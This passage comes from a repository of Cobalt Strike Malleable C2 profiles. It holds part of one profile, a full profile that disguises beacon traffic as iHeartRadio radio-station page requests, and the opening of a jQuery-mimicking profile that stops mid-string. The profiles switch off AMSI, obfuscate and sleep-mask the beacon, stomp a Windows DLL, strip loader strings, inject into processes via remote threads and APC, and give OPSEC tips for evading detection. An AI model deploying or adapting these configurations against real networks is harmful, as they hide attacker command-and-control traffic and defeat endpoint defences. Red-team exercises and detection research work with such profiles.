549 set userwx "false";
550
551 set startrwx "true";
552
553 transform-x86 {
554 prepend "\x90\x90\x90";
555 }
556 transform-x64 {
557 prepend "\x90\x90\x90";
558 }
559
560 execute {
561 #CreateThread;
562 #CreateRemoteThread;
563
564 CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
565
566 SetThreadContext;
567
568 NtQueueApcThread-s;
569
570 #NtQueueApcThread;
571
572 CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
573
574 RtlCreateUserThread;
575 }
576 }
577
578 ###Post-Ex Block###
579 post-ex {
580
581 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
582 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
583
584 set obfuscate "true";
585
586 set smartinject "true";
587
588 set amsi_disable "true";
589
590 }
+286
-0
data/profiles/Normal/iheartradio.profile less more
0 #iheartradio
1 #chose a popular top 40 station 'hit-nation'..
2 #xx0hcd
3
4 set sleeptime "30000";
5 set jitter "20";
6 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
7 set dns_idle "8.8.8.8";
8 set maxdns "235";
9
10 #custom cert
11 #https-certificate {
12 # set keystore "your_store_file.store";
13 # set password "your_store_pass";
14 #}
15
16 http-config {
17 # set headers "Server, Content-Type, Cache-Control, Connection";
18 # header "Content-Type" "text/html;charset=UTF-8";
19 # header "Connection" "close";
20 # header "Cache-Control" "max-age=2";
21 # header "Server" "nginx";
22 #set "true" if teamserver is behind redirector
23 set trust_x_forwarded_for "false";
24 }
25
26 http-get {
27
28 set uri "/live/hit-nation-4222/";
29
30 client {
31
32 header "Host" "www.iheart.com";
33 header "Accept" "*/*";
34 header "Accept-Language" "en-US";
35 header "Connection" "close";
36
37
38 metadata {
39 base64url;
40
41 prepend "GED_PLAYLIST_ACTIVITY=";
42 prepend "_gads=ID=53c4a:S=ALNI_M32;";
43 prepend "uid=1492;";
44 prepend "pid=3913;";
45 prepend "ihr_c=US;id=HdqX;";
46 header "Cookie";
47
48 }
49
50 }
51
52 server {
53
54 header "Content-Type" "text/html; charset=utf-8";
55 header "Edge-Control" "cache-maxage=3600";
56 header "Server" "nginx/1.4.6 (Ubuntu)";
57 header "X-Powered-By" "Express";
58 header "Access-Control-Allow-Origin" "*";
59 header "Accept-Ranges" "bytes";
60 header "Via" "1.1 varnish";
61 header "Age" "315";
62 header "Connection" "close";
63 header "X-Served-By" "cache-dfw1822-DFW";
64 header "X-Cache" "HIT";
65 header "X-Cache-Hits" "1";
66 header "X-Timer" "S1499866924.089752,VS0,VE1";
67
68
69 output {
70
71 base64url;
72
73 prepend "<!DOCTYPE html>
74 <html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
75 <head>
76 <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
77 <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
78 <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today&#x27;s Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 &amp; Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 &amp; Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
79 <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";
80
81
82 append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 &amp; Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today&#x27;s Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
83 <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
84 </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
85 <div id='jw-wrapper' class='hidden'>
86 <div id='jw-player'></div>
87 </div>
88 <div id='ads-wrapper' class='hidden'>
89 <a id='ads-learn-more' target='_blank'>Learn More</a>
90 <div id='ads-player'></div>
91 </div>
92 <script src=/a/locale/?rel=7.33.1></script>
93 <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
94 <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
95 </body>
96 </html>";
97
98 print;
99 }
100 }
101 }
102
103 http-post {
104
105 set uri "/Live/hit-nation-4222/";
106 set verb "GET";
107
108 client {
109
110 header "Host" "www.iheart.com";
111 header "Accept" "*/*";
112
113 output {
114 base64url;
115
116 prepend "GED_PLAYLIST_ACTIVITY=";
117 prepend "_gads=ID=53c4a:S=ALNI_M32;";
118 prepend "uid=1492;";
119 prepend "pid=3913;";
120 prepend "ihr_c=US;id=HdqX;";
121 header "Cookie";
122
123
124 }
125
126
127 id {
128 base64url;
129
130 parameter "autoplay";
131
132 }
133 }
134
135 server {
136
137 header "Content-Type" "text/html; charset=utf-8";
138 header "Edge-Control" "cache-maxage=3600";
139 header "Server" "nginx/1.4.6 (Ubuntu)";
140 header "X-Powered-By" "Express";
141 header "Access-Control-Allow-Origin" "*";
142 header "Accept-Ranges" "bytes";
143 header "Via" "1.1 varnish";
144 header "Age" "315";
145 header "Connection" "close";
146 header "X-Served-By" "cache-dfw1822-DFW";
147 header "X-Cache" "HIT";
148 header "X-Cache-Hits" "1";
149 header "X-Timer" "S1499866924.089752,VS0,VE1";
150
151 #just keeping output together for responses
152 output {
153 base64;
154
155 prepend "<!DOCTYPE html>
156 <html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
157 <head>
158 <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
159 <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
160 <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today&#x27;s Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 &amp; Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 &amp; Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
161 <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";
162
163
164 append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 &amp; Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today&#x27;s Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
165 <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
166 </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
167 <div id='jw-wrapper' class='hidden'>
168 <div id='jw-player'></div>
169 </div>
170 <div id='ads-wrapper' class='hidden'>
171 <a id='ads-learn-more' target='_blank'>Learn More</a>
172 <div id='ads-player'></div>
173 </div>
174 <script src=/a/locale/?rel=7.33.1></script>
175 <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
176 <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
177 </body>
178 </html>";
179
180 print;
181 }
182 }
183 }
184
185 http-stager {
186
187 set uri_x86 "/Console";
188 set uri_x64 "/console";
189
190 client{
191 header "Host" "www.iheart.com";
192 header "Accept" "*/*";
193 header "Accept-Language" "en-US";
194 header "Connection" "close";
195 }
196
197 server {
198 header "Server" "nginx/1.4.6 (Ubuntu)";
199 header "Content-Type" "text/html; charset=utf-8";
200 header "Connection" "close";
201
202 }
203
204
205 }
206
207 ###Malleable PE Options###
208
209 post-ex {
210
211 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
212 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
213
214 set obfuscate "true";
215
216 set smartinject "true";
217
218 set amsi_disable "true";
219
220 }
221
222 #use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
223 #don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
224 stage {
225 set checksum "0";
226 set compile_time "25 Oct 2016 01:57:23";
227 set entry_point "170000";
228 #set image_size_x86 "6586368";
229 #set image_size_x64 "6586368";
230 #set name "WWanMM.dll";
231 set userwx "false";
232 set cleanup "true";
233 set sleep_mask "true";
234 set stomppe "true";
235 set obfuscate "true";
236 set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
237
238 #obfuscate beacon before sleep.
239 set sleep_mask "true";
240
241 #module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
242
243 set module_x86 "wwanmm.dll";
244 set module_x64 "wwanmm.dll";
245
246 #transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
247 transform-x86 {
248 prepend "\x90\x90\x90";
249 strrep "ReflectiveLoader" "";
250 strrep "beacon.dll" "";
251 }
252
253 transform-x64 {
254 prepend "\x90\x90\x90";
255 strrep "ReflectiveLoader" "";
256 strrep "beacon.x64.dll" "";
257 }
258
259 }
260
261 process-inject {
262
263 set allocator "NtMapViewOfSection";
264
265 set min_alloc "16700";
266
267 set userwx "false";
268
269 set startrwx "true";
270
271 transform-x86 {
272 prepend "\x90\x90\x90";
273 }
274 transform-x64 {
275 prepend "\x90\x90\x90";
276 }
277
278 execute {
279 CreateThread "ntdll!RtlUserThreadStart";
280 CreateThread;
281 NtQueueApcThread;
282 CreateRemoteThread;
283 RtlCreateUserThread;
284 }
285 }
+666
-0
data/profiles/Normal/jquery-c2.4.2.profile less more
0 # Malleable C2 Profile
1 # Version: CobaltStrike 4.2
2 # File: jquery-c2.4.2.profile
3 # Description:
4 # c2 profile attempting to mimic a jquery.js request
5 # uses signed certificates
6 # or self-signed certificates
7 # Authors: @joevest, @andrewchiles, @001SPARTaN
8
9 ################################################
10 ## Tips for Profile Parameter Values
11 ################################################
12
13 ## Parameter Values
14 ## Enclose parameter in Double quote, not single
15 ## set useragent "SOME AGENT"; GOOD
16 ## set useragent 'SOME AGENT'; BAD
17
18 ## Some special characters do not need escaping
19 ## prepend "!@#$%^&*()";
20
21 ## Semicolons are ok
22 ## prepend "This is an example;";
23
24 ## Escape Double quotes
25 ## append "here is \"some\" stuff";
26
27 ## Escape Backslashes
28 ## append "more \\ stuff";
29
30 ## HTTP Values
31 ## Program .http-post.client must have a compiled size less than 252 bytes.
32
33 ################################################
34 ## Profile Name
35 ################################################
36 ## Description:
37 ## The name of this profile (used in the Indicators of Compromise report)
38 ## Defaults:
39 ## sample_name: My Profile
40 ## Guidelines:
41 ## - Choose a name that you want in a report
42 set sample_name "jQuery CS 4.2 Profile";
43
44 ################################################
45 ## Sleep Times
46 ################################################
47 ## Description:
48 ## Timing between beacon check in
49 ## Defaults:
50 ## sleeptime: 60000
51 ## jitter: 0
52 ## Guidelines:
53 ## - Beacon Timing in milliseconds (1000 = 1 sec)
54 set sleeptime "45000"; # 45 Seconds
55 #set sleeptime "300000"; # 5 Minutes
56 #set sleeptime "600000"; # 10 Minutes
57 #set sleeptime "900000"; # 15 Minutes
58 #set sleeptime "1200000"; # 20 Minutes
59 #set sleeptime "1800000"; # 30 Minutes
60 #set sleeptime "3600000"; # 1 Hours
61 set jitter "37"; # % jitter
62
63 ################################################
64 ## Server Response Size jitter
65 ################################################
66 ## Description:
67 ## Append random-length string (up to data_jitter value) to http-get and http-post server output.
68 set data_jitter "100";
69
70 ################################################
71 ## HTTP Client Header Removal
72 ################################################
73 ## Description:
74 ## Global option to force Beacon's WinINet to remove specified headers late in the HTTP/S transaction process.
75 ## Value:
76 ## headers_remove Comma-separated list of HTTP client headers to remove from Beacon C2.
77 # set headers_remove "Strict-Transport-Security, header2, header3";
78
79 ################################################
80 ## Beacon User-Agent
81 ################################################
82 ## Description:
83 ## User-Agent string used in HTTP requests, CS versions < 4.2 approx 128 max characters, CS 4.2+ max 255 characters
84 ## Defaults:
85 ## useragent: Internet Explorer (Random)
86 ## Guidelines
87 ## - Use a User-Agent values that fits with your engagement
88 ## - useragent can only be 128 chars
89 ## IE 10
90 # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)";
91 ## MS IE 11 User Agent
92 set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
93
94 ################################################
95 ## SSL CERTIFICATE
96 ################################################
97 ## Description:
98 ## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener
99 ## Defaults:
100 ## All certificate values are blank
101 ## Guidelines:
102 ## - Best Option - Use a certifcate signed by a trusted certificate authority
103 ## - Ok Option - Create your own self signed certificate
104 ## - Option - Set self-signed certificate values
105 https-certificate {
106
107 ## Option 1) Trusted and Signed Certificate
108 ## Use keytool to create a Java Keystore file.
109 ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl
110 ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
111
112 ## Option 2) Create your own Self-Signed Certificate
113 ## Use keytool to import your own self signed certificates
114
115 #set keystore "/pathtokeystore";
116 #set password "password";
117
118 ## Option 3) Cobalt Strike Self-Signed Certificate
119 set C "US";
120 set CN "jquery.com";
121 set O "jQuery";
122 set OU "Certificate Authority";
123 set validity "365";
124 }
125
126 ################################################
127 ## TCP Beacon
128 ################################################
129 ## Description:
130 ## TCP Beacon listen port
131 ## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
132 ## - https://www.cobaltstrike.com/help-tcp-beacon
133 ## TCP Frame Header
134 ## - Added in CS 4.1, prepend header to TCP Beacon messages
135 ## Defaults:
136 ## tcp_port: 4444
137 ## tcp_frame_header: N\A
138 ## Guidelines
139 ## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port.
140 ## - Use a port other that default. Choose something not is use.
141 ## - Use a port greater than 1024 is generally a good idea
142 set tcp_port "42585";
143 set tcp_frame_header "\x80";
144
145 ################################################
146 ## SMB beacons
147 ################################################
148 ## Description:
149 ## Peer-to-peer beacon using SMB for communication
150 ## SMB Frame Header
151 ## - Added in CS 4.1, prepend header to SMB Beacon messages
152 ## Defaults:
153 ## pipename: msagent_##
154 ## pipename_stager: status_##
155 ## smb_frame_header: N\A
156 ## Guidelines:
157 ## - Do not use an existing namedpipe, Beacon doesn't check for conflict!
158 ## - the ## is replaced with a number unique to a teamserver
159 ## ---------------------
160 set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
161 set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
162 set smb_frame_header "\x80";
163
164 ################################################
165 ## DNS beacons
166 ################################################
167 ## Description:
168 ## Beacon that uses DNS for communication
169 ## Defaults:
170 ## maxdns: 255
171 ## dns_idle: 0.0.0.0
172 ## dns_max_txt: 252
173 ## dns_sleep: 0
174 ## dns_stager_prepend: N/A
175 ## dns_stager_subhost: .stage.123456.
176 ## dns_ttl: 1
177 ## Guidelines:
178 ## - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels
179 set maxdns "255";
180 set dns_max_txt "252";
181 set dns_idle "74.125.196.113"; #google.com (change this to match your campaign)
182 set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds)
183 set dns_stager_prepend ".resources.123456.";
184 set dns_stager_subhost ".feeds.123456.";
185
186 ################################################
187 ## SSH beacons
188 ################################################
189 ## Description:
190 ## Peer-to-peer SSH pseudo-Beacon for lateral movement
191 ## ssh_banner
192 ## - Added in Cobalt Strike 4.1, changes client SSH banner
193 ## Defaults:
194 ## ssh_banner: Cobalt Strike 4.2
195 set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)";
196 set ssh_pipename "wkssvc##";
197
198
199 ################################################
200 ## Staging process
201 ################################################
202 ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads
203 ## Description:
204 ## Malleable C2's http-stager block customizes the HTTP staging process
205 ## Defaults:
206 ## uri_x86 Random String
207 ## uri_x64 Random String
208 ## HTTP Server Headers - Basic HTTP Headers
209 ## HTTP Client Headers - Basic HTTP Headers
210 ## Guidelines:
211 ## - Add customize HTTP headers to the HTTP traffic of your campaign
212 ## - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23
213 ## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
214 ## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc)
215
216 set host_stage "false"; # Do not use staging. Must use stageles payloads, now the default for Cobalt Strike built-in processes
217 #set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set
218
219 http-stager {
220 set uri_x86 "/jquery-3.3.1.slim.min.js";
221 set uri_x64 "/jquery-3.3.2.slim.min.js";
222
223 server {
224 header "Server" "NetDNA-cache/2.2";
225 header "Cache-Control" "max-age=0, no-cache";
226 header "Pragma" "no-cache";
227 header "Connection" "keep-alive";
228 header "Content-Type" "application/javascript; charset=utf-8";
229 output {
230 ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
231 # 2nd Line
232 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
233 # 1st Line
234 prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
235 append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return 